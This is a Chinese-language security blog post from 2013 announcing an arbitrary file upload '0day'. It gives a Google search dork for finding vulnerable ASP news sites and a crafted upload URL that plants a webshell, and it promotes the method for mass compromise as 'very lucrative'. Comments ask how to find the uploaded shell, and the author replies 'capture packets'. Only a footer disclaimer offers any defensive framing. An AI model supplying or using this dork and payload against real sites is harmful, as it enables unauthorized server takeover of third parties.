阿峰博客 阿峰'S blog

  • 首页
  • 移动安全
    • Android安全
    • iOS安全
    • APP安全
  • 新闻资讯
    • IT新闻
    • 安全资讯
  • 信息安全
    • WEB安全
    • 系统安全
    • 终端安全
    • 安全工具
  • 建站优化
    • 网站优化
    • 网络营销
  • 资源共享
  • 关于博客
    • 申请友链
    • 在线投稿
不忘初心,砥砺前行。
  1. 首页
  2. 信息安全
  3. 正文

任意文件上传漏洞可批量拿shell

2013 年 1 月 29 日 8028点热度 0人点赞 3条评论

今天呢,发布一个0day,是一个任意上传漏洞。

谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

任意上传拿shell  

很吃香哦

出图测试
1111.jpg

标签: 上传漏洞
最后更新:2013 年 1 月 29 日

阿峰

保持饥渴的专注,追求最佳的品质

点赞
< 上一篇
下一篇 >

文章评论

  • Sh1Ft2b

    请问怎么找马地址 我的博客

    2013 年 3 月 16 日
    回复
    • feng

      @Sh1Ft2b 抓包

      2013 年 3 月 17 日
      回复
  • 阿樂

    上传成功后的文件地址是什么?

    2017 年 1 月 6 日
    回复
  • 取消回复

    标签聚合
    渗透测试 xss漏洞 端口扫描 工具 Wordpress 网络安全 perl 关键字
    最新 热点 随机
    最新 热点 随机
    Immunity Canvas 7.26下载及安装教程 安卓批量搜索分析Java 类/对象结构脚本工具 MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 Joy:一款用于捕获和分析网络内部流量数据的工具 One-Lin3r:懒人的福音,渗透测试单行化工具 EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具
    MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用安卓批量搜索分析Java 类/对象结构脚本工具Immunity Canvas 7.26下载及安装教程
    百度网盘35G(两年)+10G(永久)免费扩容 百度刚推出"全站链接"你了解多少? 申请.me域名教程 免费一年 HTML5最新漏洞:用户硬盘或被垃圾数据塞满 深夜出炉:httpoxy远程代理感染漏洞浅析 45分钟扫遍全网:最快的互联网扫描工具ZMap 1.2.1版使用手册
    最近评论
    发布于 2 年前(07月07日) 小哥,可以帮忙把我的友链修改为 https://feifanblog.com 么?谢谢啦~
    发布于 3 年前(07月23日) top.document.body.innerHTML=""; 这个是1.js 还是xss ...
    发布于 3 年前(11月22日) 看错了,还以为是你买的register.com呢。。。
    发布于 3 年前(10月22日) 大佬 求sql 放正系统注入工具
    发布于 4 年前(05月27日) 感觉还是非常复杂的呢。。。。

    COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.

    本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。